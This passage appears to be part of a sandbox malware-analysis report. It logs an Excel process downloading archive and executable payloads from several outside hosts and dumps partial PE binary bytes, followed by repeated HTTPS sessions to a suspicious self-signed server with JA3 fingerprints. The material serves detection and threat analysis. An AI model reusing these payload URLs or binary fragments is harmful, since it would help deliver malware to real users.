00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a1 fa 01 10 c3 fa 01 10 b7 fa 01 10 89 fa 01 10 95 fa 01 10 50 f9 01 10 b0 f9 01 10 20 fa 01 10 00 00 00 00 00 00 00 00 4c 51 0a 10 54 8d 0a 10 4f 99 0a 10 68 f7 0a 10 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$15Q!uT?ruT?ruT?rrtT?rxrwT?rxrtT?rxrzT?rxrwT?rrvT?ruT>r<T?rxrtT?rxrzT?rxrtT?rxrtT?rRichuT?rPELR!do@`rM\q<`8(@p\.textbd `.datah@.idata p@@.rsrc@@.reloc@BP LQTOh


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                3 | 192.168.2.22 | 49168 | 132.148.96.144 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Jan 20, 2021 16:13:28.319467068 CET | 1620 | OUT | GET /ylztwx.rar HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: www.gastronauts.asia
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:28.514552116 CET | 1621 | IN | HTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:13:28 GMT
                                                                                Server: Apache
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, Keep-Alive
                                                                                Last-Modified: Wed, 20 Jan 2021 08:57:00 GMT
                                                                                ETag: "2a38d0-bae00-5b9512357cf00-gzip"
                                                                                Accept-Ranges: bytes
                                                                                Vary: Accept-Encoding,User-Agent
                                                                                Content-Encoding: gzip
                                                                                Keep-Alive: timeout=5
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: application/x-rar-compressed
                                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 77 5c 13 cf f7 2f 3c a1 46 04 83 08 8a 8a 8a ba 2a 8a 02 8a 05 c5 42 09 b8 68 90 5e 14 44 54 44 c4 8e c1 0a 88 04 90 b0 44 b0 77 4c 0f 89 1d 1b a2 d2 a5 c8 0a 8a 15 1b 76 17 c1 86 0a 2a ea 3e 33 1b 3e df f2 bb f7 3e f7 f5 fc ff 44 c3 66 77 a7 ed ec 9c 73 de e7 cc 99 33 de f3 72 80 2e 00 40 0f 7e 69 1a 80 02 a0 fd b8 80 ff fb e7 07 fc f6 18 54 d8 03 9c ef 76 73 70 01 8b 77 73 70 60 cc b2 75 d6 6b e2 56 2f 8d 5b b8 d2 7a f1 c2 55 ab 56 f3 ad 17 2d b1 8e 8b 5f 65 bd 6c 95 35 d7 27 c0 7a e5 ea a8 25 76 26 26 46 58 57 19 63 27 f8 0d 8e 0f 9c 11 f7 cf 37 ef f8 97 38 3e 3c 6e 34 78 19 b7 81 39 3e ef 3a 6f 8a db cc 1c 9f 31 d7 f3 8e 7f 8b 5b cf e4 99 1e 37 95 b9 fe aa 2b dd a3 ae 74 af bb ce 5f 30 47 ff 65 8b 63 50 f9 ff b4 dd d7 03 00 1e 4b 1f 58 34 3d f1 ff e7 da 73 a0 33 b8 3b cb 18 80 a8 ee 00 f4 66 31 d7 0e ac 36 02 c0 14 fe 48 ee 8e 4e 4d 99 df 3a 00 18 74 e5 f9 e7 08 ce 18 6b 3b 91 b9 ed c2 62 32 99 6a b3 68 8f da 43 64 5c 77 e0 0d 8f e1 6b 8d c1 54 74 31 d9 18 98 ea ff 6f 3a 37 c7 18 50 fd 60 7a 98 c9 e9 ff e5 1d d8 7c 63 fd f7 bb 5a 63 0c c2 59 ff e7 f4 76 fc 25 1b f9 f0 78 72 51 77 6d 83 d0 b3 ea fd 77 1a 6b 58 ad 5d d4 42 fe 42 f8 bb 9a 02 da 67 87 6d 01 31 dd ff 2b 1d ac b7 c4 6e 99 36 a1 75 37 6d dd 00 76 17 48 f9 5f d2 b9 d8 c5 ad 8b 5b 0c 7f 33 cf 0a 9f 99 e9 b8 ac ff 5d ba 25 2b 56 c3 84 e8 d9 51 1f 00 2b 78 dc f5 bf a4 73 fb 3f 3f e1 ff ff f9 ff fa 91 fc 62 99 96 c3 ef 25 f8 15 c2 ef 5e f8 f5 fd c9 32 3d 03 bf d6 f0 f7 3f e9 78 7e 46 a6 81 22 23 53 9f 83 46 a6 31 1d 46 ff ba fe a3 c5 c8 74 77 44 77 d3 b2 83 ff be f6 9f 9f 7f 68 0c 92 0d f0 83 df 35 70 cc ae a1 58 ff 75 0f be 69 60 0e bf 15 f0 5e 05 bc 27 41 17 7d fd 82 25 e6 87 13 59 8e 15 be 22 2e 66 1c 25 43 17 89 2f c4 8e 1f 90 65 51 3d 85 4b 01 95 b5 2f 0c f8 c6 d2 31 54 cf 40 96 88 87 99 53 c7 37 87 01 6d 82 58 10 ab 03 b3 99 fa 56 71 31 6b 94 93 fa 74 7d 69 
d7 3d 22 9d 0d 07 bd 5f 2c f0 a5 a6 74 1b 03 04 15 c6 30 33 1b 26 34 a7 e1 87 0a 9e 06 0b e1 c1 1a 85 26 28 e3 dc 08 41 85 69 39 89 3e b0 aa 4e 33 27 56 d4 ff b9 7d b1 91 d4 3a bb 58 40 7c 16 54 e8 09 f9 18 3b ad 1d 15 8b ee f0 39 44 1d 75 1c d4 d2 55 06 a3 61 73 5b 74 1c db 61 25 a3 33 b9 18 46 04 62 36 7e f0 c4 da 3f c3 33 9c e0 62 36 be 7e 31 03 0d 61 3b eb 60 66 1b a6 4d 3a ac 5a 3a 98 5a 91 31 10 10 d5 d4 f7 cc f0 ff 7d 03 1b 3f 06 05 13 5f 42 a2 ab 3c 4d 75 00 fc 6b a6 0b 2a 3d f5 e0 57 1f 38 36 88 92 70 c7 9a e8 c9 73 cc 92 2c 88 aa a7 be b7 04 a5 ac a7 a6 9c e2 55 66 82 12 b6 f3 cd 84 0f 9c 62 4f 53 41 19 4b 50 65 e9 7c 2b e1 5e 2c 78 fa 50 34 87 4d f5 9d 5a 49 c7 02 d1 1c 63 aa 3e c4 1d 2c 88 98 af ed 09 ed 07 b6 55 2f 20 98 e0 63 a6 44 23 91 91 05 db 12 22 24 4c 59 a8 f7 45 5b 6c 2e 4f 41 1d 02 be 2a 62 51 a3 41 ef 1f b4 af 88 b0 86 3d 4f a5 32 45 85 95 b1 01 f9 5f 1f d8 bf 62 83 89 ff f4 6f 40 50 70 c8 7f f4 b0 79 d7 08 68 8e 79
                                                                                Data Ascii: 1faaw\/<F*Bh^DTDDwLv*>3>>Dfws3r.@~iTvspwsp`ukV/[zUV-_el5'z%v&&FXWc'78><n4x9>:o1[7+t_0GecPKX4=s3;f16HNM:tk;b2jhCd\wkTt1o:7P`z|cZcYv%xrQwmwkX]BBgm1+n6u7mvH_[3]%+VQ+xs??b%^2=?x~F"#SF1FtwDwh5pXui`^'A}%Y".f%C/eQ=K/1T@S7mXVq1kt}i="_,t03&4&(Ai9>N3'V}:X@|T;9DuUas[ta%3Fb6~?3b6~1a;`fM:Z:Z1}?_B<Muk*=W86ps,UfbOSAKPe|+^,xP4MZIc>,U/ cD#"$LYE[l.OA*bQA=O2E_bo@Ppyhy


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                4 | 192.168.2.22 | 49169 | 85.17.252.207 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Jan 20, 2021 16:13:30.386687040 CET | 1663 | OUT | GET /uzssv27.rar HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: laureys.be
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:30.439138889 CET | 1663 | IN | HTTP/1.1 302 Found
                                                                                Date: Wed, 20 Jan 2021 15:13:30 GMT
                                                                                Server: Apache
                                                                                Location: http://laureys.be/cgi-sys/suspendedpage.cgi
                                                                                Content-Length: 227
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 75 72 65 79 73 2e 62 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://laureys.be/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                                                                Jan 20, 2021 16:13:31.319897890 CET | 1664 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: laureys.be
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:31.405452013 CET | 1664 | IN | HTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:13:31 GMT
                                                                                Server: Apache
                                                                                Keep-Alive: timeout=5, max=99
                                                                                Connection: Keep-Alive
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                5 | 192.168.2.22 | 49176 | 64.37.52.138 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Jan 20, 2021 16:14:29.273102045 CET | 1775 | OUT | GET /by9zwa7p1.zip HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: cms.ivpr.org
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:14:29.931037903 CET | 1778 | IN | HTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:14:27 GMT
                                                                                Server: Apache
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains;
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Last-Modified: Thu, 14 Jan 2021 04:03:15 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 765440
                                                                                Cache-Control: max-age=2592000
                                                                                Expires: Fri, 19 Feb 2021 15:14:27 GMT
                                                                                Keep-Alive: timeout=5, max=50
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/zip
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 
00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$15Q!uT?ruT?ruT?rrtT?rxrwT?rxrtT?rxrzT?rxrwT?rrvT?ruT>r<T?rxrtT?rxrzT?rxrtT?rxrtT?rRichuT?rPELR!do@`rM\q<`8(@p\.textbd `.datah@.idata p@@.rsrc@@.reloc@B


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                6 | 192.168.2.22 | 49181 | 185.32.190.115 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Jan 20, 2021 16:14:31.949980021 CET | 2614 | OUT | GET /d8ms3mljy.zip HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: salaodigitalautomovel.pt.deve.pt
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:14:32.020127058 CET | 2615 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Wed, 20 Jan 2021 15:14:29 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                HTTPS Packets

                                                                                Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                                                                Jan 20, 2021 16:14:23.457039118 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49171 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:26.228542089 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49170 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:31.550004005 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49179 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:34.591666937 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49183 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:39.169614077 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49186 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:39.331029892 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49187 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:43.089103937 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49191 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:43.135684967 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49192 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:50.108299017 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49199 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:53.840101957 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49204 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:58.035561085 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49209 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:00.493616104 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49212 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
